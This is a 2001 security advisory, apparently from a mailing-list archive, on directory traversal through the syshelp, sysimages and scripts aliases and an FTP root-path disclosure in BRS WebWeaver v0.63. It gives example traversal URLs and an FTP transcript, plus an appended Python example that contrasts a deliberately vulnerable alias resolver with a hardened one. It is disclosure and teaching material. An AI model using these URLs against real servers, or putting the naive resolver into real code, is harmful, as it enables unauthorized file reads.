----- Begin Hush Signed Message from joetestaat_private -----

Vulnerabilities in BRS WebWeaver

Overview

BRS WebWeaver v0.63 is a combined ftp and web server available from http://bsoutham.home.dhs.org. Vulnerabilities exist in the web server which allow remote users to break out of the web root using relative paths (i.e. '..', '...'). In addition, the ftp server can be made to disclose the physical path of the ftp root.

Details

The following URLs demonstrate the problem with the web server:

  http://localhost/syshelp/../[any file outside the web root]
  http://localhost/sysimages/../[any file outside the web root]
  http://localhost/scripts/../[any file outside the web root]

The following is an illustration of the problem with the ftp server:

  >ftp localhost
  Connected to xxxxxxxxxxxx.rh.rit.edu.
  220 BRS WebWeaver FTP Server ready.
  User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
  331 Password required for jdog.
  Password:
  230 User jdog logged in.
  ftp> cd *
  250 CWD command successful. "/*/" is current directory.
  ftp> ls
  200 Port command successful.
  150 Opening data connection for directory list.
  c:\windows\desktop\*\*.* not found
  226 File sent ok
  ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
  ftp>

Solution

The web server root traversal vulnerabilities can be prevented by removing all user-defined aliases (i.e. 'syshelp', 'sysimages') as well as the ISAPI/CGI alias (i.e. 'scripts'). There is no solution for the ftp root disclosure vulnerability.

Vendor Status

Blaine R Southam was contacted via <bsouthamat_private> on Saturday, April 21, 2001. No reply was received.
- Joe Testa
e-mail: joetestaat_private
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron

----- Begin Hush Signature v1.3 -----
CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
----- End Hush Signature v1.3 -----

This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools
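The alias-plus-'..' bug class described in the advisory above, shown as an added example that is not part of the original post and is not WebWeaver's code. The document root, the alias table and the file names are constructed for the example (WebWeaver's real install layout is unknown here). resolve_vulnerable() does what a naive server does: prefix-match the first URL segment against the alias table and concatenate the remainder onto the alias directory, so '..' walks out of the aliased directory. resolve_hardened() percent-decodes and lexically canonicalises the URL path before consulting the alias table, refuses all-dot segments such as '...', and re-checks containment on the physical path.

```python
import posixpath
from urllib.parse import unquote

# Constructed configuration for this example; the paths are hypothetical
# and are not WebWeaver's real install layout.
WEB_ROOT = "/srv/www/htdocs"
ALIASES = {
    "syshelp": "/srv/www/help",
    "sysimages": "/srv/www/images",
    "scripts": "/srv/www/cgi-bin",
}


class TraversalError(Exception):
    """The request would resolve outside the directory it may see."""


def resolve_vulnerable(url_path):
    """The weak pattern: match the first segment against the alias table,
    glue the rest of the URL onto the alias directory and let the
    filesystem interpret any '..' in it. '/syshelp/../x' therefore walks
    out of the 'syshelp' directory, as the advisory describes."""
    first, _, rest = url_path.lstrip("/").partition("/")
    base = ALIASES.get(first)
    if base is None:
        return posixpath.normpath(WEB_ROOT + "/" + url_path.lstrip("/"))
    return posixpath.normpath(base + "/" + rest)


def _segments(url_path):
    """Lexically canonicalise a decoded URL path into clean segments.
    '..' pops the previous segment and is refused at the top level; an
    all-dot segment of three or more dots ('...') is refused outright,
    since it has no legitimate meaning and DOS-era Windows filesystems
    treated it as a further step upward."""
    out = []
    for seg in url_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                raise TraversalError("path climbs above the root: %r" % url_path)
            out.pop()
        elif seg.strip(".") == "":
            raise TraversalError("all-dot segment refused: %r" % seg)
        else:
            out.append(seg)
    return out


def resolve_hardened(url_path):
    """Decode and canonicalise first, apply the alias table only to the
    cleaned segments (so '..' can never cross an alias boundary), then
    re-check containment of the physical path as a second line of defence."""
    decoded = unquote(url_path).replace("\\", "/")  # %2e%2e and backslashes
    segs = _segments(decoded)
    if segs and segs[0] in ALIASES:
        base, rest = ALIASES[segs[0]], segs[1:]
    else:
        base, rest = WEB_ROOT, segs
    phys = posixpath.normpath(posixpath.join(base, *rest))
    if posixpath.commonpath([base, phys]) != base:
        raise TraversalError("resolved outside %s: %s" % (base, phys))
    return phys


def is_refused(url_path):
    """True if the hardened resolver rejects the request."""
    try:
        resolve_hardened(url_path)
    except TraversalError:
        return True
    return False


if __name__ == "__main__":
    # Constructed request paths exercising the cases from the advisory.
    for url in ("/syshelp/intro.htm", "/syshelp/../secret.ini",
                "/scripts/%2e%2e/secret.ini", "/sysimages/.../secret.ini",
                "/../secret.ini"):
        print("%-30s naive    -> %s" % (url, resolve_vulnerable(url)))
        try:
            print("%-30s hardened -> %s" % ("", resolve_hardened(url)))
        except TraversalError as exc:
            print("%-30s hardened -> refused (%s)" % ("", exc))
```

The resolution here is purely lexical, which is what blocks the alias escape; a server that also follows symlinks must additionally realpath() the result and re-check containment. Note that the naive resolver's output for '...' looks harmless on POSIX, where '...' is an ordinary name; the hardened resolver refuses it anyway because the advisory targets a Windows host, where it was a traversal primitive.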
This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 17:39:14 PDT